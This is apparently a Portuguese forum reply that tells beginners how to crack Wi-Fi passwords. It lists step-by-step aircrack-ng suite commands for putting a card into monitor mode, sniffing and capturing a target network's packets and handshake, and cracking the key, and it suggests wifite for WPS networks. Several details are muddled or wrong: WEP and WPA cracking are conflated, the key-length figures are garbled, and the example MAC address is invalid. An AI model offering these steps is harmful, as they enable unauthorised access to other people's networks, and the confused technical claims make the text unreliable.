
crm
(usa Ubuntu)
Enviado em 01/04/2017 - 20:28h
vix hehehe pegaram pesado heih?
entao, vamo lá más é literatura pesada p/ iniciante más vc vai entender um pouco do tutorial aqui.
AIRCRACK-NG sao um conjunto de ferramentas ( aircrack-ng, airmon-ng, airodump-ng aireplay-ng )
estas sao as primeiras ferramentas p/ quebra de senhas wpa2, wep ,wpa, wps.
na prática, primeira ferramenta a ser usada é # airmon-ng, por ser um ativador de placa de rede em modo de monitoraçao.
# airmon-ng check kill ( checa a placa de rede)
#airmon-ng start wlan0 ( coloca a placa de rede em modo de monitoraçao wlan0mon ou wlan0 )
# airodump-ng wlan0mon ( sninfar a rede p/ indentificar os MACS p/ o atacker )
# airodump-ng -c xx -b xx:xx:xx:xx wlan0mon ( sninfa uma determinada rede sendo q -c xx , canal ,-b bssid MAC da rede wlan0mon, device )
ex # airodump-ng -c xx -b 56:00:d5:u7:3e:2e -w capture wlan0mon ( capture os pacotes de um bssid -b p/ poder crackear a senha )
após a capturaçao dos pacotes da rede é aguardado o handshake ou sejá o aperto de mao !
# aircrack-ng * .ivs
OBS: aircrack-ng precisa de no mínimo de 200.000,00 ivs q contém senhas de até 8 dígitos sendo q os IVS estao na captura dos pacotes com airodump-ng
senhas de 8 dígitos 64 bits
senhas de 16 a 20 dígitos 128 bits
senhas de 20 a 30 dígitos 256 bits
se o teste q vc for fazer for em uma rede wps vc pode usar
# ./ wifite.py --wps sendo uma ferramenta escrita em python ,ela sninfa, e crackeia ao mesmo tempo .
espero ter ajudado um pouco p/ mais informaçao leia o artigo em
www.aircrack.org